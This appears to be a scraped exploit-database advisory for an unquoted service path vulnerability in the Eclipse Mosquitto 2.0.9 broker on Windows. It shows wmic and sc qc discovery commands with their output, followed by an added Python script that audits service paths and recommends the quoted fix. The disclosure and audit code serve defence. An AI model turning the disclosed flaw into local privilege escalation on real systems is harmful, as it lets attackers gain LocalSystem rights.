## https://sploitus.com/exploit?id=PACKETSTORM:161872
# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path  
# Discovery by: Riadh Bouchahoua   
# Discovery Date: 19-03-2021  
# Vendor Homepage: https://mosquitto.org/  
# Software Link: https://mosquitto.org/download/  
# Tested Version: 2.0.9  
# Vulnerability Type: Unquoted Service Path  
# Tested on OS: Windows 10 64-bit  
  
# Steps to discover the Unquoted Service Path:  
  
  
  
====  
  
C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"  
mosquitto C:\Program Files\mosquitto\mosquitto.exe run   
  
====  
  
C:\Users\Admin>sc qc mosquitto  
[SC] QueryServiceConfig réussite(s)  
  
SERVICE_NAME: mosquitto  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Mosquitto Broker  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem
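
A defensive check for the condition shown above, as an added example that is not part of the original advisory: it parses `sc qc` output collected from a host, flags a BINARY_PATH_NAME whose executable path contains spaces but is not quoted, and returns the quoted form the service should use. The function names and the ".exe" splitting heuristic are assumptions of this example, and the sample input is constructed from the output on this page.

```python
import re

# Constructed sample: the `sc qc mosquitto` output from this advisory, trimmed.
SAMPLE_SC_QC = r"""
SERVICE_NAME: mosquitto
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run
SERVICE_START_NAME : LocalSystem
"""

EXE_END = re.compile(r"\.exe\b", re.IGNORECASE)


def binary_path(sc_qc_output):
    """Return the BINARY_PATH_NAME value from `sc qc` output, or None."""
    for line in sc_qc_output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "BINARY_PATH_NAME":
            return value.strip()
    return None


def split_command(path):
    """Split a service command line into (executable, arguments, quoted)."""
    if path.startswith('"'):
        end = path.find('"', 1)
        if end != -1:
            return path[1:end], path[end + 1:].strip(), True
        path = path[1:]  # unbalanced quote: treat as unquoted
    m = EXE_END.search(path)
    if m is None:  # heuristic: no ".exe", so the whole string is the executable
        return path, "", False
    return path[:m.end()], path[m.end():].strip(), False


def audit(sc_qc_output):
    """Flag an unquoted executable path containing spaces and give the quoted form."""
    path = binary_path(sc_qc_output)
    if path is None:
        return None
    exe, args, quoted = split_command(path)
    flagged = not quoted and " " in exe
    fixed = f'"{exe}" {args}'.strip() if flagged else path
    return {"executable": exe, "flagged": flagged, "recommended": fixed}


if __name__ == "__main__":
    print(audit(SAMPLE_SC_QC))
```

The `recommended` value is what the service's ImagePath should contain so that the executable path is enclosed in quotes and the `run` argument stays outside them.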